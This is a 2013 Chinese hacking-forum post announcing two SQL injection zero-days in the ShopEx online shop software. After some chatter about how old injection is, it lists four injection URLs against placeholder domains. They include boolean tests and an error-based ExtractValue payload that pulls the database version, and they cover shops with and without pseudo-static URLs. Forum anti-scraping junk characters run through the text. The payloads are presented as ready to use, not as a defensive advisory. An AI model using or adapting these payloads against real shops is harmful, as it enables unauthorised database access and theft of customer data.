找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2044|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 08:31:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 6 o6 v9 I% B6 h

  ~8 c  I- k# k, ^  d# A0 R好吧,我扯远了~~9 @8 N" O$ w+ w* W" C( I! [* T
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
! C. d# p' {3 f  O不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- |& K& n  W/ Y  i7 {$ R
/ _# Y' t7 T- I' m, W; Qhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 5 \7 S$ S1 ~8 v+ k- F6 O

9 ?4 r, _0 h2 T: q; `; e( {9 phttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 3 r& z! X& W6 `

3 }9 ]. r, R' |1 s+ \http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
9 X. |7 b& r, V$ n' C. J$ ]) c. z. N- \0 A: t- h& R
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html + V6 K8 b% U/ z1 Z5 v

( x. A1 p0 [; q" | 0 h: P5 U& d1 F" y* ?% S# p6 M
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。4 M* y' K* B5 n
如何注入就不多说了,10多年的东西了…不会也会了…
: ?: Z, H- L3 {
2 h: |& p, Q& b4 S2 ?9 A# d2 y) T4 r: A  C. i

1 P4 C+ ~3 X2 {, ?8 y. Q8 U3 v3 b3 T9 _3 W, t& n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表